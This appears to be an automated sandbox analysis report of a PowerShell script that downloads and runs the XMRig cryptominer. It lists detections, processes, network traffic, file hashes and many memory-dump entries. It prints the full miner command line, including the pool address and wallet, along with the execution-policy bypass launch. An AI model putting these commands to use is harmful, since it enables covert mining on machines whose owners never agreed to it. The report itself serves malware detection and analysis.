"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp

Files

memory/796-3-0x00007FFD0B763000-0x00007FFD0B764000-memory.dmp

memory/796-5-0x0000023FFCBD0000-0x0000023FFCBF2000-memory.dmp

memory/796-6-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/796-9-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/796-10-0x0000023FFCF00000-0x0000023FFCF76000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lcsjreac.vpr.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/796-25-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/796-29-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/796-30-0x00007FFD0B763000-0x00007FFD0B764000-memory.dmp

memory/796-31-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/796-32-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/796-52-0x0000023FFCC80000-0x0000023FFCC92000-memory.dmp

memory/796-65-0x0000023FFCC70000-0x0000023FFCC7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3500-94-0x00000198D0380000-0x00000198D03A0000-memory.dmp

memory/3500-95-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-96-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-97-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-98-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-99-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-100-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-101-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-102-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-103-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-104-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-105-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-106-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-107-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-108-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-109-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-110-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-111-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-112-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-113-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-114-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-115-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-116-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-117-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-118-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-119-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-120-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-121-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-122-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-123-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-124-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-125-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-126-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-127-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-128-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-129-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-130-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-131-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-132-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-133-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-134-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-135-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-136-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-137-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-138-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-139-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-140-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-141-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-142-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-143-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-144-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-145-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-146-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-147-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-148-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-149-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-150-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-151-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-152-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-153-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-154-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-155-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-156-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

memory/3500-157-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1762s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3660-0-0x00007FFAB4823000-0x00007FFAB4824000-memory.dmp

memory/3660-5-0x000002A376100000-0x000002A376122000-memory.dmp

memory/3660-8-0x00007FFAB4820000-0x00007FFAB520C000-memory.dmp

memory/3660-9-0x000002A376760000-0x000002A3767D6000-memory.dmp

memory/3660-10-0x00007FFAB4820000-0x00007FFAB520C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgmxhzwd.kyi.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3660-25-0x00007FFAB4820000-0x00007FFAB520C000-memory.dmp

memory/3660-61-0x000002A376160000-0x000002A37616A000-memory.dmp

memory/3660-48-0x000002A376720000-0x000002A376732000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4820-90-0x00000225B2110000-0x00000225B2130000-memory.dmp

memory/3660-91-0x00007FFAB4823000-0x00007FFAB4824000-memory.dmp

memory/4820-92-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/3660-93-0x00007FFAB4820000-0x00007FFAB520C000-memory.dmp

memory/4820-94-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-95-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-96-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-97-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-98-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-99-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-100-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-101-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-102-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-103-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-104-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-105-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-106-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-107-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-108-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-109-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-110-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-111-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-112-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-113-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-114-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-115-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-116-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-117-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-118-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-119-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-120-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-121-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-122-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-123-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-124-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-125-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-126-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-127-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-128-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-129-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-130-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-131-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-132-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-133-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-134-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-135-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-136-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-137-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-138-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-139-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-140-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-141-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-142-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-143-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-144-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-145-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-146-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-147-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-148-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-149-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-150-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-151-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-152-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-153-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-154-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-155-0x00007FF772B20000-0x00007FF773753000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10v2004-20240426-en

Max time kernel

1790s

Max time network

1742s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 10.73.50.20.in-addr.arpa udp

Files

memory/1724-0-0x00007FFB22493000-0x00007FFB22495000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tl41su3x.xvv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1724-10-0x0000020B719F0000-0x0000020B71A12000-memory.dmp

memory/1724-11-0x00007FFB22490000-0x00007FFB22F51000-memory.dmp

memory/1724-12-0x00007FFB22490000-0x00007FFB22F51000-memory.dmp

memory/1724-14-0x00007FFB22490000-0x00007FFB22F51000-memory.dmp

memory/1724-16-0x0000020B71A60000-0x0000020B71A6A000-memory.dmp

memory/1724-15-0x0000020B71DE0000-0x0000020B71DF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2660-47-0x000001FE2B300000-0x000001FE2B320000-memory.dmp

memory/2660-48-0x000001FE2CC00000-0x000001FE2CC20000-memory.dmp

memory/2660-49-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-50-0x000001FE2CC20000-0x000001FE2CC40000-memory.dmp

memory/1724-51-0x00007FFB22493000-0x00007FFB22495000-memory.dmp

memory/1724-52-0x00007FFB22490000-0x00007FFB22F51000-memory.dmp

memory/2660-53-0x000001FE2CC40000-0x000001FE2CC60000-memory.dmp

memory/2660-54-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/1724-55-0x00007FFB22490000-0x00007FFB22F51000-memory.dmp

memory/2660-56-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-58-0x000001FE2CC20000-0x000001FE2CC40000-memory.dmp

memory/2660-57-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-59-0x000001FE2CC40000-0x000001FE2CC60000-memory.dmp

memory/2660-60-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-61-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-62-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-63-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-64-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-65-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-66-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-67-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-68-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-69-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-70-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-71-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-72-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-73-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-74-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-75-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-76-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-77-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-78-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-79-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-80-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-81-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-82-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-83-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-84-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-85-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-86-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-87-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-88-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-89-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-90-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-91-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-92-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-93-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-94-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-95-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-96-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-97-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-98-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-99-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-100-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-101-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-102-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-103-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-104-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-105-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-106-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-107-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-108-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-109-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-110-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-111-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-112-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-113-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-114-0x00007FF606D60000-0x00007FF607993000-memory.dmp

